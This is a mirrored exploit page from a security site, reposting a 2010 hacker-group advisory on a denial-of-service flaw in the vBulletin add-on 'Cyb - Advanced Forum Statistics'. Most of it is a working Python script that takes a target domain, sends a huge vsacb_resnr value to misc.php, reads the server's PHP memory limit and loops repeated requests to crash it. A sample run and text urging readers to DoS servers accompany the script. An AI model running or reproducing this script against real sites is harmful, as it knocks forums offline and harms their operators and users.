首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
vBulletin "Cyb - Advanced Forum Statistics" DOS
来源:Andhra Hackers 作者:Andhra 发布时间:2010-04-12  

# Exploit Title: vBulletin "Cyb - Advanced Forum Statistics" DOS
# Date: 10-4-2010
# Author: Andhra Hackers
# Software Link:
# Version: Web Application
# Tested on: Apcahe/Unix
# CVE : [if exists]
# Code :


PHP crashes existed from a long time back and there were several issues which were a reason for that.
1)PHP pack() function bug has been there for about a long time, were if PHP try to allocate more memory more than generally allocated to PHP function then the the request is terminated and PHP exits/Crashes, this might even send a huge load to the server.

2)PHP memory allocation is done via the php.ini file of PHP installation, So if we could make PHP try to load with more memmory than it could handle then we cold possibly crash php or even the server causing a huge CPU usage.

3)A vulnerability exist in vBulletin add-on "Cyb - Advanced Forum Statistics" in the misc.php file show=latestposts&vsacb_resnr=, were application loads all latest 'n' no of post
depending on (vsacb_resnr= n) value. As no of post "vsacb_resnr" is user specific,that means we could make vBulletin to load huge no of datas from DB causing it to run out of memory and crash PHP and huge load may crash hosted apache also and won't be able to recover easily.

Attached is exploit code which could easily crash a vBulletin which has got "Cyb - Advanced Forum Statistics" add-on installed.
Either You could Use the attached exploit code to DOS the server or you could Simply move to the vulnerable page and
sent simultaneous request by refreshing the page.


An attacker could exploit this issue to crash the php installed and the crash might DOS the entire server for hours or attacker will be able to
download php files from the server.

A quick fix for this is to modify php.ini config file and increase the Php allocated memory to a higher value.


Exploit:
import urllib,urllib2,re
print "####################################"
print "#[+]ICW 0-day Domain Crasher #"
print "#[+] Exploit found by Yash [ICW] #"
print "#[+] Exploit Coded by FB1H2S [ICW] #"
print "#[+] Care-Taker d4rk-blu [ICW] #"
print "#[+] Indian Cyber Warriors #"
print "####################################\n"
print "Enter Domain Adress:"
domain=raw_input("[+]Ex: www.site.com<http://www.site.com>:")
url ='http://'+domain+'/misc.php?show=latestposts&vsacb_resnr=10000000'
res = urllib.urlopen(url).read(200)
phpmem= re.findall('of (.*?)bytes.*?',res)
bytes=int(phpmem[0])
mb=bytes/1048576
print '[+]Server php memmory is:'+str(mb)+' MB'
print "[+]Enter the No of request you wann send:"
kill=raw_input("Some 20-30 will be enough:")
try:
for i in range(1,int(kill)):
print i
res1 = urllib.urlopen(url).read(200)
print res1
except(IOError),msg: print "Server will be FCUK'ed by now"


################################################################
C:\Python25>python vbexploit.py
####################################
#[+]ICW 0-day Domain Crasher #
#[+] Bug found by Yash [ICW] #
#[+] Exploit Coded by FB1H2S [ICW] #
#[+] Care-Taker d4rk-blu [ICW] #
#[+] Indian Cyber Warriors #
####################################

Enter Domain Adress:
[+]Ex: www.site.com<http://www.site.com>: sitehere

[+]Server php memmory is:32 MB
[+]Enter the No of request you wann send:20
1
2
3
Server will be FCUK'ed by now


#Yash (yash@andhrahackers.com<mailto:yash@andhrahackers.com>)

#################################################################################################
#Greetz to all Andhra Hackers and ICW Memebers[Indian Cyber Warriors]
#Thanks: SaiSatish,FB1H2S,d4rk-blu™,Mannu,Harin,Jappy,Dj Hoodlum Don,Sam,Circuit,cph4cker
#Shoutz: hg_H@x0r,r45c4l,41w@r10r,Hackuin
#Catch us at www.andhrahackers.com<http://www.andhrahackers.com> or www.teamicw.in<http://www.teamicw.in>
# Thnx to FB1H2S for Python Code :-)


 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Trellian FTP Client PASV BOF e
·IE/Opera source code viewer Nu
·Tembria Server Monitor v5.6.0
·Elite Gaming Ladders <= v3.5 (
·Linux Kernel <= 2.6.34-rc3 Rei
·JAVA Web Start Arbitrary comma
·vBulletin 0-day Denial Of Serv
·WINDOWS FTP SERVER by DWG (Aut
·Aladdin eToken PKI Client v4.5
·Java Deployment Toolkit Perfor
·PHP 5.3.0 getopt() Denial of S
·WinSoftMagic Photo Editor .PNG
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved